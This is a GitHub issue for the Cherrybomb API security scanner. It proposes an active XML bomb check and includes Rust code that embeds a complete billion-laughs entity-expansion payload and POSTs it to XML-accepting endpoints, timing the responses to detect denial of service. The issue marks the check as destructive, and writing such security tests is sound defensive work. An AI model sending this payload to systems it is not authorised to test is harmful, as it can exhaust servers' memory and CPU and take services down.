blst-security / cherrybomb

Stop half-done APIs! Cherrybomb is a CLI tool that helps you avoid undefined user behaviour by auditing your API specifications, validating them and running API security tests.

Home Page:https://www.blstsecurity.com/cherrybomb



XML bomb active check

RazMag opened this issue · comments

This is a check suggested by @DeliciousBounty.
Not implemented yet: the payload is a classic entity-expansion ("billion laughs") document that can exhaust a vulnerable server's memory/CPU, so the check must wait until test levels exist and it can be gated behind an explicitly destructive level.

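    /// Active check: sends an XML entity-expansion ("billion laughs") payload to every
    /// path in `self.payloads` whose first `POST` operation accepts `application/xml`,
    /// and records how long each request took.
    ///
    /// Destructive: an unprotected parser expands the payload to roughly 10^9 copies of
    /// `lol` and may exhaust the target's memory or CPU. This is not a passive check and
    /// must only run at a test level that permits destructive tests.
    ///
    /// * `auth` - authorization attached to every request.
    ///
    /// Returns the collected alerts/logs plus, in request order, the wall-clock duration
    /// of each request. A request that fails (timeout, connection reset) still adds a
    /// duration but no alert, because there is no response to attach; callers should
    /// treat such a failure as the strongest denial-of-service indicator in `vec_time`.
    pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) {
        // The XML declaration must be the very first bytes of the document: leading
        // whitespace before `<?xml` is a well-formedness error, so a strict parser would
        // reject the body before expanding anything and a true positive would be missed.
        // Ten levels of ten-fold expansion -> 10^9 copies of "lol" in an unprotected parser.
        // The closing tag must be complete as well (`</lolz>`), for the same reason.
        const XML_BOMB: &str = r#"<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"#;
        let body = XML_BOMB.to_string();

        let mut ret_val = CheckRetVal::default();
        let mut vec_time = Vec::new();

        // Loop-invariant: resolve the target server once. A spec without `servers` used
        // to panic on the first matching path; now the check simply reports nothing.
        let base_url = match self
            .oas
            .servers()
            .and_then(|servers| servers.first().cloned())
        {
            Some(server) => server,
            None => {
                println!("XML BOMB : no server URL in the spec, nothing to test");
                return (ret_val, vec_time);
            }
        };

        for oas_map in self.payloads.iter() {
            // One request per path. The payload is fixed XML, independent of the JSON
            // schema entries in `payload.map`, so iterating those entries (as an earlier
            // draft did) only re-sent the same bomb once per entry to the same endpoint.
            let post_op = oas_map
                .path
                .path_item
                .get_ops()
                .iter()
                .find(|(method, operation)| {
                    *method == Method::POST
                        && operation
                            .request_body
                            .clone()
                            .unwrap_or_default()
                            .inner(&self.oas_value)
                            .content
                            .contains_key("application/xml")
                });
            let method = match post_op {
                Some((method, _operation)) => *method,
                None => continue,
            };

            let xml_header = MHeader {
                name: "Content-type".to_string(),
                value: "application/xml".to_string(),
            };
            let req = AttackRequest::builder()
                .uri(&base_url.url, &oas_map.path.path)
                .method(method)
                .headers(vec![xml_header])
                .payload(&body)
                .parameters(vec![])
                .auth(auth.clone())
                .build();

            print!("XML BOMB {} : ", oas_map.path.path);

            // Measure only the request itself; logging below is excluded from the timing.
            let start = Instant::now();
            match req.send_request(true).await {
                Ok(res) => {
                    let elapsed = start.elapsed();
                    // Logging request/response/description.
                    ret_val.1.push(&req, &res, "Test for XML BOMB".to_string());
                    ret_val.0.push((
                        ResponseData {
                            location: oas_map.path.path.clone(),
                            // A 2xx by itself does not prove the entities were expanded
                            // (a hardened parser typically rejects the DTD with a 4xx),
                            // so the alert carries status and latency for the reviewer.
                            alert_text: format!(
                                "Endpoint accepted an XML entity-expansion (billion laughs) payload: HTTP {} in {} ms. Confirm the XML parser disables DTD/entity expansion.",
                                res.status,
                                elapsed.as_millis()
                            ),
                        },
                        res.clone(),
                    ));
                    println!(
                        "{}:{}",
                        "Status".green().bold(),
                        res.status.to_string().magenta()
                    );
                    vec_time.push(elapsed);
                }
                Err(_) => {
                    // No response to attach an alert to; the (long) duration recorded
                    // here is what tells the caller the target likely choked on the payload.
                    println!("REQUEST FAILED");
                    vec_time.push(start.elapsed());
                }
            }
        }
        (ret_val, vec_time)
    }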